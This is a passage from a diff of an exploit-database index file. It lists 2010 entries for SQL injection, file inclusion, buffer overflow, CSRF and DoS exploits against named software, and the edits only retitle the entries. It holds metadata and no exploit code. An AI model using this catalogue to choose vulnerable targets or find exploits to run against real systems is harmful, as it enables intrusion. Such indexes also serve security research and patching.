(.lst) file local Buffer Overflow Exploit",2010-03-18,"fl0 fl0w",windows,local,0 11795,platforms/php/webapps/11795.txt,"DewNewPHPLinks 2.1.0.1 LFI",2010-03-18,ITSecTeam,php,webapps,0 -11797,platforms/windows/local/11797.py,"ZippHo 3.0.6 (.zip) 0day stack buffer overflow PoC exploit",2010-03-18,mr_me,windows,local,0 +11797,platforms/windows/local/11797.py,"ZippHo 3.0.6 - (.zip) Stack Buffer Overflow PoC Exploit (0day)",2010-03-18,mr_me,windows,local,0 11799,platforms/php/webapps/11799.txt,"SiteDone Custom Edition 2.0 - SQL Injection & XSS Vulnerability",2010-03-18,d3v1l,php,webapps,0 11801,platforms/php/webapps/11801.txt,"phpAuthent 0.2.1 - SQL Injection Vulnerability",2010-03-18,Gamoscu,php,webapps,0 11802,platforms/php/webapps/11802.txt,"philboard 1.02 - SQL Injection Vulnerability",2010-03-18,ViRuS_HiMa,php,webapps,0 11803,platforms/windows/dos/11803.txt,"Crimson Editor SEH Overwrite Vulnerability",2010-03-18,sharpe,windows,dos,0 11805,platforms/php/webapps/11805.txt,"phpscripte24 Niedrig Gebote Pro Auktions System II Blind SQL Injection",2010-03-18,"Easy Laster",php,webapps,0 -11806,platforms/php/webapps/11806.txt,"nensor cms 2.01 Multiple Vulnerabilities",2010-03-18,"cr4wl3r ",php,webapps,0 -11807,platforms/php/webapps/11807.txt,"SOFTSAURUS 2.01 Multiple Remote File Include Vulnerabilities",2010-03-18,"cr4wl3r ",php,webapps,0 +11806,platforms/php/webapps/11806.txt,"nensor cms 2.01 - Multiple Vulnerabilities",2010-03-18,"cr4wl3r ",php,webapps,0 +11807,platforms/php/webapps/11807.txt,"SOFTSAURUS 2.01 - Multiple Remote File Include Vulnerabilities",2010-03-18,"cr4wl3r ",php,webapps,0 11808,platforms/php/webapps/11808.txt,"quality point 1.0 newsfeed (sql/xss) Multiple Vulnerabilities",2010-03-19,Red-D3v1L,php,webapps,0 11809,platforms/windows/dos/11809.py,"eDisplay Personal FTP server 1.0.0 Pre-Authentication DoS (PoC)",2010-03-19,loneferret,windows,dos,21 11810,platforms/windows/dos/11810.py,"eDisplay Personal FTP server 1.0.0 - Multiple Post-Authentication Crash SEH (PoC)",2010-03-19,loneferret,windows,dos,21 11811,platforms/php/webapps/11811.txt,"phpscripte24 Preisschlacht Liveshop System SQL Injection (seite&aid) index.php",2010-03-19,"Easy Laster",php,webapps,0 -11813,platforms/php/webapps/11813.txt,"DirectAdmin 1.34.4 - Multi CSRF vulnerability",2010-03-19,K053,php,webapps,0 +11813,platforms/php/webapps/11813.txt,"DirectAdmin 1.34.4 - Multi CSRF Vulnerability",2010-03-19,K053,php,webapps,0 11814,platforms/php/webapps/11814.txt,"joomla component & plugin JE Tooltip 1.0 - Local File Inclusion",2010-03-19,"Chip d3 bi0s",php,webapps,0 11815,platforms/php/webapps/11815.txt,"joomla component Gift Exchange com_giftexchange 1.0 Beta - (pkg) Remote SQL Injection",2010-03-20,"Chip d3 bi0s",php,webapps,0 11816,platforms/php/webapps/11816.txt,"Pay Per Watch & Bid Auktions System BLIND SQL Injection auktion.php (id_auk)",2010-03-20,"Easy Laster",php,webapps,0 @@ -10795,7 +10795,7 @@ id,file,description,date,author,platform,type,port 11825,platforms/php/webapps/11825.html,"Adult Video Site Script Multiple Vulnerabilities",2010-03-21,indoushka,php,webapps,0 11826,platforms/php/webapps/11826.txt,"Jewelry Cart Software (product.php) SQL Injection Vulnerability",2010-03-21,Asyraf,php,webapps,0 11827,platforms/windows/dos/11827.py,"no$gba 2.5c (.nds) local crash",2010-03-21,l3D,windows,dos,0 -11828,platforms/windows/local/11828.py,"Crimson Editor r3.70 SEH Overwrite Vulnerability PoC exploit",2010-03-21,mr_me,windows,local,0 +11828,platforms/windows/local/11828.py,"Crimson Editor r3.70 SEH Overwrite Vulnerability PoC Exploit",2010-03-21,mr_me,windows,local,0 11829,platforms/php/webapps/11829.txt,"Woltlab Burning Board Lite Addon (lexikon.php) SQL Injection Vulnerability",2010-03-21,n3w7u,php,webapps,0 11830,platforms/php/webapps/11830.txt,"Fw-BofF (oolime-resurrection) 1.5.3beta Multiple Remote Include Vulnerability",2010-03-21,"cr4wl3r ",php,webapps,0 11831,platforms/php/webapps/11831.txt,"WebMaid CMS <= 0.2-6 Beta Multiple Remote File Include Vulnerability",2010-03-21,"cr4wl3r ",php,webapps,0 @@ -10808,7 +10808,7 @@ id,file,description,date,author,platform,type,port 11838,platforms/windows/dos/11838.php,"SAFARI APPLE 4.0.5 (object tag) (JavaScriptCore.dll) DoS (Crash)",2010-03-22,3lkt3F0k4,windows,dos,0 11839,platforms/windows/dos/11839.py,"Donar Player 2.2.0 - Local Crash PoC",2010-03-22,b0telh0,windows,dos,0 11840,platforms/php/webapps/11840.txt,"PowieSys <= 0.7.7 alpha index.php (shownews) SQL Injection Vulnerability",2010-03-22,"Easy Laster",php,webapps,0 -11841,platforms/php/webapps/11841.txt,"new advisore stack ver 1.1 - Directory Traversal",2010-03-22,R3VAN_BASTARD,php,webapps,0 +11841,platforms/php/webapps/11841.txt,"New Advisore Stack 1.1 - Directory Traversal",2010-03-22,R3VAN_BASTARD,php,webapps,0 11842,platforms/windows/dos/11842.py,"FreeSSHD 1.2.4 - Remote Buffer Overflow DoS",2010-03-22,Pi3rrot,windows,dos,0 11844,platforms/php/webapps/11844.txt,"Joomla Component com_flash SQL Injection Vulnerability",2010-03-22,"DevilZ TM",php,webapps,0 11845,platforms/php/webapps/11845.txt,"Joomla component com_jwmmxtd <= Remote File Inclusion Vulnerability",2010-03-23,eidelweiss,php,webapps,0 @@ -10826,7 +10826,7 @@ id,file,description,date,author,platform,type,port 11862,platforms/php/webapps/11862.txt,"Easy-Clanpage <= 2.0 - Blind SQL Injection Exploit",2010-03-24,"Easy Laster",php,webapps,0 11863,platforms/php/webapps/11863.txt,"CMS By SoftnSolv (index.php) SQL Injection Vulnerable",2010-03-24,"Th3 RDX",php,webapps,0 11864,platforms/php/webapps/11864.txt,"E-php CMS SQL Injection Vulnerability",2010-03-24,"Th3 RDX",php,webapps,0 -11865,platforms/php/webapps/11865.txt,"Joomla component com_universal Remote File Inclusion Vulnerability exploit",2010-03-24,eidelweiss,php,webapps,0 +11865,platforms/php/webapps/11865.txt,"Joomla component com_universal Remote File Inclusion Vulnerability Exploit",2010-03-24,eidelweiss,php,webapps,0 11866,platforms/php/webapps/11866.txt,"New CMS Local File Inclusion",2010-03-24,Xash,php,webapps,0 11867,platforms/php/webapps/11867.txt,"Joomla Component com_wallpapers SQL Injection Vulnerability",2010-03-24,"DevilZ TM",php,webapps,0 11868,platforms/php/webapps/11868.txt,"Joomla Component com_software SQL Injection Vulnerability",2010-03-24,"DevilZ TM",php,webapps,0 @@ -10840,14 +10840,14 @@ id,file,description,date,author,platform,type,port 11878,platforms/windows/dos/11878.py,"Cisco TFTP Server 1.1 - DoS",2010-03-25,_SuBz3r0_,windows,dos,69 11879,platforms/windows/remote/11879.txt,"SAP GUI 7.00 - BExGlobal Active-X unsecure method",2010-03-25,"Alexey Sintsov",windows,remote,0 11880,platforms/hardware/dos/11880.txt,"Lexmark Multiple Laser printer Remote Stack Overflow",2010-03-25,"Francis Provencher",hardware,dos,0 -11881,platforms/php/webapps/11881.php,"SiteX CMS 0.7.4 beta (/photo.php) SQL-Injection exploit",2010-03-25,Sc0rpi0n,php,webapps,0 +11881,platforms/php/webapps/11881.php,"SiteX CMS 0.7.4 beta (/photo.php) SQL-Injection Exploit",2010-03-25,Sc0rpi0n,php,webapps,0 11882,platforms/php/webapps/11882.txt,"Direct News 4.10.2 - Multiple Remote File Include Vulnerability",2010-03-25,mat,php,webapps,0 11883,platforms/php/webapps/11883.txt,"WebSiteBaker 2.8.1 DataBase Backup Disclosure",2010-03-25,Tr0y-x,php,webapps,0 11884,platforms/php/webapps/11884.txt,"Joomla Component dcsFlashGames 2.0RC1 - SQL Vulnerability (catid)",2010-03-26,kaMtiEz,php,webapps,0 -11885,platforms/php/webapps/11885.txt,"Flirt Matching SMS System <= SQL Injection Exploit",2010-03-26,"Easy Laster",php,webapps,0 +11885,platforms/php/webapps/11885.txt,"Flirt Matching Sms System <= SQL Injection Exploit",2010-03-26,"Easy Laster",php,webapps,0 11886,platforms/windows/remote/11886.py,"SAP MaxDB Malformed Handshake Request Remote Code Execution",2010-03-26,"S2 Crew",windows,remote,0 11888,platforms/php/webapps/11888.txt,"DaFun Spirit 2.2.5 - Multiple Remote File Include Vulnerability",2010-03-26,2010-03-26,php,webapps,0 -11889,platforms/php/webapps/11889.txt,"leaftec cms multiple vulnerabilities",2010-03-26,Valentin,php,webapps,0 +11889,platforms/php/webapps/11889.txt,"leaftec cms Multiple vulnerabilities",2010-03-26,Valentin,php,webapps,0 11890,platforms/ios/dos/11890.txt,"iOS Safari - Bad ""VML"" Remote DoS",2010-03-26,"Nishant Das Patnaik",ios,dos,0 11891,platforms/ios/dos/11891.txt,"iOS Safari - Remote DoS",2010-03-26,"Nishant Das Patnaik",ios,dos,0 11892,platforms/php/webapps/11892.txt,"post Card (catid) Remote SQL Injection Vulnerability",2010-03-26,"Hussin X",php,webapps,0 @@ -10865,8 +10865,8 @@ id,file,description,date,author,platform,type,port 11905,platforms/php/webapps/11905.txt,"Simple Machines Forum (SMF) <= 1.1.8 - (avatar) Remote PHP File Execute PoC",2010-03-27,JosS,php,webapps,0 11906,platforms/php/webapps/11906.txt,"Uebimiau Webmail <= 2.7.2 - Multiple Vulnerabilities.",2010-03-27,"cp77fk4r ",php,webapps,0 11908,platforms/php/webapps/11908.txt,"Joomla Component com_solution SQL Injection Vulnerability",2010-03-27,"DevilZ TM",php,webapps,0 -11909,platforms/windows/local/11909.txt,"Mini-stream Ripper 3.1.0.8 - Local stack overflow exploit",2010-03-28,"Hazem mofeed",windows,local,0 -11911,platforms/windows/local/11911.py,"Stud_PE <= 2.6.05 - Stack Overflow PoC exploit",2010-03-28,zha0,windows,local,0 +11909,platforms/windows/local/11909.txt,"Mini-stream Ripper 3.1.0.8 - Local Stack Overflow Exploit",2010-03-28,"Hazem mofeed",windows,local,0 +11911,platforms/windows/local/11911.py,"Stud_PE <= 2.6.05 - Stack Overflow PoC Exploit",2010-03-28,zha0,windows,local,0 11912,platforms/php/webapps/11912.txt,"Multi Auktions Komplett System 2 - Blind SQL Injection Exploit",2010-03-28,"Easy Laster",php,webapps,0 11914,platforms/php/webapps/11914.txt,"Joomla Component com_adds Blind SQL Injection Vulnerability",2010-03-28,"DevilZ TM",php,webapps,0 11915,platforms/php/webapps/11915.txt,"Joomla Component com_tariff SQL Injection Vulnerability",2010-03-28,"DevilZ TM",php,webapps,0 @@ -10875,7 +10875,7 @@ id,file,description,date,author,platform,type,port 11918,platforms/php/webapps/11918.txt,"Joomla Component com_science SQL Injection Vulnerability",2010-03-28,"DevilZ TM",php,webapps,0 11919,platforms/php/webapps/11919.txt,"Joomla Component com_topmenu SQL Injection Vulnerability",2010-03-28,"DevilZ TM",php,webapps,0 11920,platforms/php/webapps/11920.txt,"Joomla Component com_personal SQL Injection Vulnerability",2010-03-28,"DevilZ TM",php,webapps,0 -11922,platforms/php/webapps/11922.txt,"Devana SQL Injection vulnerability",2010-03-28,Valentin,php,webapps,0 +11922,platforms/php/webapps/11922.txt,"Devana SQL Injection Vulnerability",2010-03-28,Valentin,php,webapps,0 11923,platforms/php/webapps/11923.txt,"TSOKA:CMS 1.1 & 1.9 & 2.0 - SQL Injection & XSS Vulnerability",2010-03-28,d3v1l,php,webapps,0 11924,platforms/php/webapps/11924.txt,"Joomla Component com_units SQL Injection Vulnerabilit",2010-03-28,"DevilZ TM",php,webapps,0 11925,platforms/php/webapps/11925.txt,"68kb Knowledge Base Script 1.0.0rc2 Search - SQL Injection",2010-03-28,"Jelmer de Hen",php,webapps,0 @@ -10887,7 +10887,7 @@ id,file,description,date,author,platform,type,port 11932,platforms/linux/dos/11932.txt,"xwine 1.0.1 (.exe file) - Local Crash PoC Exploit",2010-03-29,JosS,linux,dos,0 11934,platforms/php/webapps/11934.txt,"Powie's PSCRIPT Gästebuch <= 2.09 SQL Injection Vulnerability",2010-03-29,"Easy Laster",php,webapps,0 11935,platforms/php/webapps/11935.txt,"Joomla Component com_guide SQL Injection Vulnerability",2010-03-30,"DevilZ TM",php,webapps,0 -11938,platforms/php/webapps/11938.txt,"Pepsi CMS (Irmin cms) pepsi-0.6-BETA2 Multiple Local File Vulnerability",2010-03-30,eidelweiss,php,webapps,0 +11938,platforms/php/webapps/11938.txt,"Pepsi CMS (Irmin cms) pepsi-0.6-BETA2 - Multiple Local File Vulnerability",2010-03-30,eidelweiss,php,webapps,0 11939,platforms/php/webapps/11939.txt,"Joomla Component com_spec SQL Injection Vulnerability",2010-03-29,"DevilZ TM",php,webapps,0 11940,platforms/php/webapps/11940.txt,"Joomla Component com_television SQL Injection Vulnerability",2010-03-29,"DevilZ TM",php,webapps,0 11941,platforms/php/webapps/11941.txt,"Joomla Component com_items SQL Injection Vulnerability",2010-03-29,"DevilZ TM",php,webapps,0 @@ -10904,9 +10904,9 @@ id,file,description,date,author,platform,type,port 11954,platforms/php/webapps/11954.txt,"Wazzum Dating Software Mullti Vulnerability",2010-03-30,EL-KAHINA,php,webapps,0 11955,platforms/windows/dos/11955.py,"All to All Audio Convertor 2.0 - Files Stack Overflow PoC",2010-03-30,ITSecTeam,windows,dos,0 11957,platforms/windows/local/11957.py,"Shadow Stream Recorder 3.0.1.7 (.asx) Local Buffer Overflow",2010-03-30,b0telh0,windows,local,0 -11958,platforms/windows/local/11958.py,"ASX to MP3 Converter 3.0.0.100 - Local stack overflow exploit",2010-03-30,"Hazem mofeed",windows,local,0 +11958,platforms/windows/local/11958.py,"ASX to MP3 Converter 3.0.0.100 - Local Stack Overflow Exploit",2010-03-30,"Hazem mofeed",windows,local,0 11959,platforms/windows/dos/11959.pl,"Xilisoft Blackberry Ring Tone Maker .wma Local Crash",2010-03-30,anonymous,windows,dos,0 -11960,platforms/php/webapps/11960.txt,"KimsQ 040109 Multiple Remote File Include Vulnerability",2010-03-30,mat,php,webapps,0 +11960,platforms/php/webapps/11960.txt,"KimsQ 040109 - Multiple Remote File Include Vulnerability",2010-03-30,mat,php,webapps,0 11962,platforms/php/webapps/11962.txt,"Satellite-X 4.0 (Auth Bypass) SQL Injection Vulnerability",2010-03-30,indoushka,php,webapps,0 11963,platforms/php/webapps/11963.txt,"Huron CMS 8 11 2007 (Auth Bypass) SQL Injection Vulnerability",2010-03-30,mat,php,webapps,0 11964,platforms/multiple/webapps/11964.pl,"Easy-Clanpage <= 2.1 - SQL Injection Exploit",2010-03-30,"Easy Laster",multiple,webapps,0 @@ -10916,16 +10916,16 @@ id,file,description,date,author,platform,type,port 11968,platforms/php/webapps/11968.txt,"Hosting-php-dynamic (Auth Bypass) Vulnerability",2010-03-30,indoushka,php,webapps,0 11973,platforms/windows/remote/11973.txt,"CompleteFTP Server Directory Traversal",2010-03-30,zombiefx,windows,remote,0 11974,platforms/windows/remote/11974.py,"HP OpenView NNM OvWebHelp.exe CGI Topic overflow",2010-03-30,"S2 Crew",windows,remote,0 -11975,platforms/windows/dos/11975.rb,"Free MP3 CD Ripper 2.6 - 0day (1)",2010-03-30,"Richard leahy",windows,dos,0 -11976,platforms/windows/local/11976.php,"Free MP3 CD Ripper 2.6 - (wav) 1day stack buffer overflow PoC exploit",2010-03-31,mr_me,windows,local,0 +11975,platforms/windows/dos/11975.rb,"Free MP3 CD Ripper 2.6 - (0day)",2010-03-30,"Richard leahy",windows,dos,0 +11976,platforms/windows/local/11976.php,"Free MP3 CD Ripper 2.6 - (wav) 1day Stack Buffer Overflow PoC Exploit",2010-03-31,mr_me,windows,local,0 11977,platforms/windows/dos/11977.pl,"CDTrustee .BAK Local Crash PoC",2010-03-31,anonymous,windows,dos,0 11978,platforms/php/webapps/11978.txt,"Joomla Component DW Graph Local File Inclusion",2010-03-31,"Chip d3 bi0s",php,webapps,0 11979,platforms/php/webapps/11979.pl,"Centreon IT & Network Monitoring 2.1.5 - Injection SQL",2010-03-31,"Jonathan Salwan",php,webapps,0 -11980,platforms/php/webapps/11980.txt,"Easy-Clanpage <= 2.2 - multiple SQL Injection + Exploit",2010-03-31,"Easy Laster",php,webapps,0 +11980,platforms/php/webapps/11980.txt,"Easy-Clanpage <= 2.2 - Multiple SQL Injection + Exploit",2010-03-31,"Easy Laster",php,webapps,0 11981,platforms/windows/local/11981.py,"WM Downloader 3.0.0.9 (.asx) Local Buffer Overflow",2010-03-31,b0telh0,windows,local,0 11983,platforms/php/webapps/11983.txt,"Joomla Component com_actions SQL Injection Vulnerability",2010-03-31,"DevilZ TM",php,webapps,0 -11984,platforms/windows/dos/11984.py,"Optimal Archive 1.38 - (.zip) SEH PoC 0day",2010-03-31,TecR0c,windows,dos,0 -11985,platforms/windows/dos/11985.sh,"BitComet <= 1.19 Remote DoS Exploit",2010-03-31,"Pierre Nogues",windows,dos,0 +11984,platforms/windows/dos/11984.py,"Optimal Archive 1.38 - (.zip) SEH PoC (0day)",2010-03-31,TecR0c,windows,dos,0 +11985,platforms/windows/dos/11985.sh,"BitComet <= 1.19 - Remote DoS Exploit",2010-03-31,"Pierre Nogues",windows,dos,0 11986,platforms/linux/remote/11986.py,"OpenDcHub 0.8.1 - Remote Code Execution Exploit",2010-03-31,"Pierre Nogues",linux,remote,0 11987,platforms/windows/dos/11987.txt,"Escape From PDF",2010-03-31,"Didier Stevens",windows,dos,0 11989,platforms/php/webapps/11989.txt,"Faweb_2 Mullti Vulnerability",2010-03-30,indoushka,php,webapps,0 @@ -10948,10 +10948,10 @@ id,file,description,date,author,platform,type,port 12006,platforms/php/webapps/12006.txt,"Simple Calculator by Peter Rekdal Sunde Remote Upload Vulnerability",2010-04-01,indoushka,php,webapps,0 12007,platforms/php/webapps/12007.txt,"SimpNews 2.16.2 and Below Multiple SQL Injection Vulnerabilities",2010-04-01,NoGe,php,webapps,0 12008,platforms/windows/local/12008.pl,"TugZip 3.5 Zip File Buffer Overflow",2010-04-01,Lincoln,windows,local,0 -12009,platforms/php/webapps/12009.html,"CMS Made Simple 1.7 CSRF Vulnerability",2010-04-02,"pratul agrawal",php,webapps,0 +12009,platforms/php/webapps/12009.html,"CMS Made Simple 1.7 - CSRF Vulnerability",2010-04-02,"pratul agrawal",php,webapps,0 12010,platforms/windows/dos/12010.pl,"uTorrent WebUI <= 0.370 - Authorization header DoS Exploit",2010-04-02,"zombiefx darkernet",windows,dos,0 12011,platforms/windows/dos/12011.txt,"Google Chrome 4.1 OOB Array Indexing Bug",2010-04-02,"Tobias Klein",windows,dos,0 -12012,platforms/windows/local/12012.txt,"Free MP3 CD Ripper 2.6 - 0day (2)",2010-04-02,"Richard leahy",windows,local,0 +12012,platforms/windows/local/12012.txt,"Free MP3 CD Ripper 2.6 - (0day) (2)",2010-04-02,"Richard leahy",windows,local,0 12015,platforms/php/webapps/12015.txt,"Joomla Component com_menu SQL Injection Vulnerability",2010-04-02,"DevilZ TM",php,webapps,0 12016,platforms/php/webapps/12016.txt,"Joomla Component com_ops SQL Injection Vulnerability",2010-04-02,"DevilZ TM",php,webapps,0 12017,platforms/php/webapps/12017.txt,"Joomla Component com_football SQL Injection Vulnerability",2010-04-02,"DevilZ TM",php,webapps,0 @@ -10959,7 +10959,7 @@ id,file,description,date,author,platform,type,port 12019,platforms/php/webapps/12019.txt,"Velhost Uploader Script 1.2 - Local File Inclusion Vulnerability",2010-04-02,"cr4wl3r ",php,webapps,0 12021,platforms/php/webapps/12021.txt,"68kb Knowledge Base 1.0.0rc3 - Admin CSRF",2010-04-02,"Jelmer de Hen",php,webapps,0 12022,platforms/php/webapps/12022.txt,"68kb Knowledge Base 1.0.0rc3 - Edit Main Settings CSRF",2010-04-02,"Jelmer de Hen",php,webapps,0 -12024,platforms/windows/local/12024.php,"Zip Unzip 6.0 - (.zip) 0day stack buffer overflow PoC exploit",2010-04-03,mr_me,windows,local,0 +12024,platforms/windows/local/12024.php,"Zip Unzip 6.0 - (.zip) 0day Stack Buffer Overflow PoC Exploit",2010-04-03,mr_me,windows,local,0 12025,platforms/windows/dos/12025.php,"Dualis 20.4 (.bin) Local Daniel Of Service",2010-04-03,"Yakir Wizman",windows,dos,0 12026,platforms/php/webapps/12026.txt,"phpscripte24 Vor und Rückwärts Auktions System Blind SQL Injection Vulnerability",2010-04-03,"Easy Laster",php,webapps,0 12027,platforms/windows/dos/12027.py,"DSEmu 0.4.10 (.nds) Local Crash Exploit",2010-04-03,l3D,windows,dos,0 @@ -10969,7 +10969,7 @@ id,file,description,date,author,platform,type,port 12031,platforms/php/webapps/12031.html,"Advanced Management For Services Sites Remote Add Admin Exploit",2010-04-03,alnjm33,php,webapps,0 12032,platforms/windows/dos/12032.html,"Microsoft Internet Explorer Tabular Data Control ActiveX Remote Code Execution",2010-04-03,ZSploit.com,windows,dos,0 12033,platforms/multiple/remote/12033.txt,"Java Mini Web Server <= 1.0 Path Traversal and Cross Site Scripting",2010-04-03,"cp77fk4r ",multiple,remote,0 -12034,platforms/php/webapps/12034.txt,"flatpress 0.909.1 - Stored XSS vulnerability",2010-04-03,ITSecTeam,php,webapps,0 +12034,platforms/php/webapps/12034.txt,"flatpress 0.909.1 - Stored XSS Vulnerability",2010-04-03,ITSecTeam,php,webapps,0 12035,platforms/windows/local/12035.pl,"ZipScan 2.2c SEH",2010-04-03,"Lincoln and corelanc0d3r",windows,local,0 12036,platforms/hardware/webapps/12036.txt,"Edimax AR-7084GA Router CSRF + Persistent XSS Exploit",2010-04-03,l3D,hardware,webapps,0 12037,platforms/php/webapps/12037.txt,"Joomla component jp_jobs SQL Injection Vulnerability",2010-04-03,Valentin,php,webapps,0 @@ -10977,7 +10977,7 @@ id,file,description,date,author,platform,type,port 12039,platforms/multiple/webapps/12039.txt,"QuickEStore 6.1 Backup Dump Vulnerability",2010-04-04,indoushka,multiple,webapps,0 12041,platforms/php/webapps/12041.txt,"Solutive CMS SQL Injection Vulnerability",2010-04-04,"Th3 RDX",php,webapps,0 12042,platforms/php/webapps/12042.txt,"x10 mirco blogging 121 - SQL Injection Vulnerability",2010-04-04,ITSecTeam,php,webapps,0 -12043,platforms/php/webapps/12043.html,"Prediction League 0.3.8 CSRF Create Admin User Exploit",2010-04-04,indoushka,php,webapps,0 +12043,platforms/php/webapps/12043.html,"Prediction League 0.3.8 - CSRF Create Admin User Exploit",2010-04-04,indoushka,php,webapps,0 12044,platforms/windows/remote/12044.c,"Easy Ftp Server 1.7.0.2 - MKD Remote Post-Authentication BoF Exploit",2010-04-04,x90c,windows,remote,0 12045,platforms/php/webapps/12045.html,"MunkyScripts Simple Gallery SQL Injection Vulnerability",2010-04-04,ITSecTeam,php,webapps,0 12047,platforms/php/webapps/12047.html,"nodesforum 1.033 - Remote File Inclusion Vulnerability",2010-04-04,ITSecTeam,php,webapps,0 @@ -11025,7 +11025,7 @@ id,file,description,date,author,platform,type,port 12091,platforms/freebsd/local/12091.txt,"McAfee Email Gateway (formerly IronMail) - Internal Information Disclosure",2010-04-06,"Nahuel Grisolia",freebsd,local,0 12092,platforms/hardware/webapps/12092.txt,"McAfee Email Gateway (formerly IronMail) - Cross-Site Scripting (XSS)",2010-04-06,"Nahuel Grisolia",hardware,webapps,0 12093,platforms/hardware/dos/12093.txt,"McAfee Email Gateway (formerly IronMail) - Denial of Service",2010-04-06,"Nahuel Grisolia",hardware,dos,0 -12094,platforms/php/webapps/12094.txt,"ShopSystem SQL Injection vulnerability",2010-04-06,Valentin,php,webapps,0 +12094,platforms/php/webapps/12094.txt,"ShopSystem SQL Injection Vulnerability",2010-04-06,Valentin,php,webapps,0 12095,platforms/linux/dos/12095.txt,"Virata EmWeb R6.0.1 - Remote Crash Vulnerability",2010-04-06,"Jobert Abma",linux,dos,0 12096,platforms/windows/dos/12096.txt,"Juke 4.0.2 DoS Multiple Files",2010-04-06,anonymous,windows,dos,0 12097,platforms/php/webapps/12097.txt,"Joomla Component XOBBIX [prodid] SQL Injection Vulnerability",2010-04-06,AntiSecurity,php,webapps,0 @@ -11033,8 +11033,8 @@ id,file,description,date,author,platform,type,port 12100,platforms/asp/webapps/12100.txt,"Espinas CMS SQL Injection Vulnerability",2010-04-07,"Pouya Daneshmand",asp,webapps,0 12101,platforms/php/webapps/12101.txt,"Joomla Component aWiki com_awiki Local File Inclusion",2010-04-07,"Angela Zhang",php,webapps,0 12102,platforms/php/webapps/12102.txt,"Joomla Component VJDEO com_vjdeo 1.0 LFI Vulnerability",2010-04-07,"Angela Zhang",php,webapps,0 -12103,platforms/multiple/local/12103.txt,"Local Glibc shared library (.so) <= 2.11.1 exploit",2010-04-07,Rh0,multiple,local,0 -12104,platforms/windows/dos/12104.py,"Anyzip 1.1 - (.zip) Poc (SEH) 0day",2010-04-07,ITSecTeam,windows,dos,0 +12103,platforms/multiple/local/12103.txt,"Local Glibc shared library (.so) <= 2.11.1 Exploit",2010-04-07,Rh0,multiple,local,0 +12104,platforms/windows/dos/12104.py,"Anyzip 1.1 - (.zip) PoC (SEH) 0day",2010-04-07,ITSecTeam,windows,dos,0 12105,platforms/php/webapps/12105.txt,"Free Image & File Hosting Upload Vulnerability",2010-04-07,indoushka,php,webapps,0 12106,platforms/php/webapps/12106.txt,"Istgah for Centerhost Mullti Vulnerability",2010-04-07,indoushka,php,webapps,0 12107,platforms/php/webapps/12107.txt,"Plume CMS 1.2.4 - Multiple Local File Inclusion Vulnerabilities",2010-04-07,eidelweiss,php,webapps,0 @@ -11048,21 +11048,21 @@ id,file,description,date,author,platform,type,port 12115,platforms/php/webapps/12115.txt,"Kubeit CMS Remote SQL Injection Vulnerability",2010-04-08,Phenom,php,webapps,0 12117,platforms/windows/remote/12117.txt,"Java Deployment Toolkit Performs Insufficient Validation of Parameters",2010-04-09,"Tavis Ormandy",windows,remote,0 12118,platforms/php/webapps/12118.txt,"Joomla Component PowerMail Pro com_powermail Local File Inclusion Vulnerability",2010-04-09,AntiSecurity,php,webapps,0 -12119,platforms/windows/remote/12119.pl,"Windows FTP Server 1.4 - Auth Bypass",2010-04-09,chap0,windows,remote,0 +12119,platforms/windows/remote/12119.pl,"Windows FTP Server 1.4 - Auth Bypass",2010-04-09,chap0,windows,remote,0 12120,platforms/php/webapps/12120.txt,"Joomla Component Foobla Suggestions com_foobla Local File Inclusion",2010-04-09,"Chip d3 bi0s",php,webapps,0 -12121,platforms/php/webapps/12121.txt,"Joomla Component JA Voice com_javoice LFI vulnerability",2010-04-09,kaMtiEz,php,webapps,0 +12121,platforms/php/webapps/12121.txt,"Joomla Component JA Voice com_javoice LFI Vulnerability",2010-04-09,kaMtiEz,php,webapps,0 12122,platforms/multiple/remote/12122.txt,"JAVA Web Start Arbitrary command-line injection",2010-04-09,"Ruben Santamarta ",multiple,remote,0 12123,platforms/php/webapps/12123.txt,"joomla Component com_pcchess Local File Inclusion",2010-04-09,team_elite,php,webapps,0 -12124,platforms/php/webapps/12124.txt,"joomla component huruhelpdesk SQL injection Vulnerability",2010-04-09,bumble_be,php,webapps,0 +12124,platforms/php/webapps/12124.txt,"joomla component huruhelpdesk SQL Injection Vulnerability",2010-04-09,bumble_be,php,webapps,0 12128,platforms/php/webapps/12128.txt,"GarageSales Remote Upload Vulnerability",2010-04-09,saidinh0,php,webapps,0 12130,platforms/linux/local/12130.py,"Linux Kernel <= 2.6.34-rc3 ReiserFS xattr - Privilege Escalation",2010-04-09,"Jon Oberheide",linux,local,0 12131,platforms/windows/dos/12131.py,"Tembria Server Monitor 5.6.0 - Denial of Service",2010-04-09,Lincoln,windows,dos,0 12132,platforms/php/webapps/12132.pl,"joomla component com_agenda 1.0.1 - (id) SQL Injection Vulnerability",2010-04-09,v3n0m,php,webapps,0 12133,platforms/multiple/webapps/12133.txt,"Asset Manager 1.0 Shell Upload Vulnerability",2010-04-09,"Shichemt Alen and NeT_Own3r",multiple,webapps,0 -12134,platforms/php/webapps/12134.txt,"MMHAQ CMS sqli vulnersbility",2010-04-10,s1ayer,php,webapps,0 +12134,platforms/php/webapps/12134.txt,"MMHAQ CMS SQLi vulnersbility",2010-04-10,s1ayer,php,webapps,0 12135,platforms/php/webapps/12135.txt,"mygamingladder MGL Combo System <= 7.5 - SQL Injection",2010-04-10,"Easy Laster",php,webapps,0 12136,platforms/php/webapps/12136.txt,"Joomla Component com_properties[aid] SQL Injection Vulnerability",2010-04-10,c4uR,php,webapps,0 -12137,platforms/php/webapps/12137.txt,"joomla component allvideos BLIND SQL injection Vulnerability",2010-04-10,bumble_be,php,webapps,0 +12137,platforms/php/webapps/12137.txt,"joomla component allvideos BLIND SQL Injection Vulnerability",2010-04-10,bumble_be,php,webapps,0 12138,platforms/php/webapps/12138.txt,"Joomla Com_Ca SQL Injection Vulnerability",2010-04-10,DigitALL,php,webapps,0 12139,platforms/php/webapps/12139.txt,"Kiasabz Article News CMS Magazine SQL Injection Vulnerability",2010-04-10,indoushka,php,webapps,0 12140,platforms/php/webapps/12140.php,"xBtiTracker Remote SQL Injection Vulnerability",2010-04-11,InATeam,php,webapps,0 @@ -11077,8 +11077,8 @@ id,file,description,date,author,platform,type,port 12149,platforms/php/webapps/12149.txt,"Joomla Component spsNewsletter Local File Inclusion Vulnerability",2010-04-11,AntiSecurity,php,webapps,0 12150,platforms/php/webapps/12150.txt,"Joomla Component AlphaUserPoints Local File Inclusion Vulnerability",2010-04-11,AntiSecurity,php,webapps,0 12151,platforms/php/webapps/12151.txt,"Joomla Component TRAVELbook Local File Inclusion Vulnerability",2010-04-11,AntiSecurity,php,webapps,0 -12152,platforms/windows/remote/12152.pl,"Trellian FTP Client PASV BOF 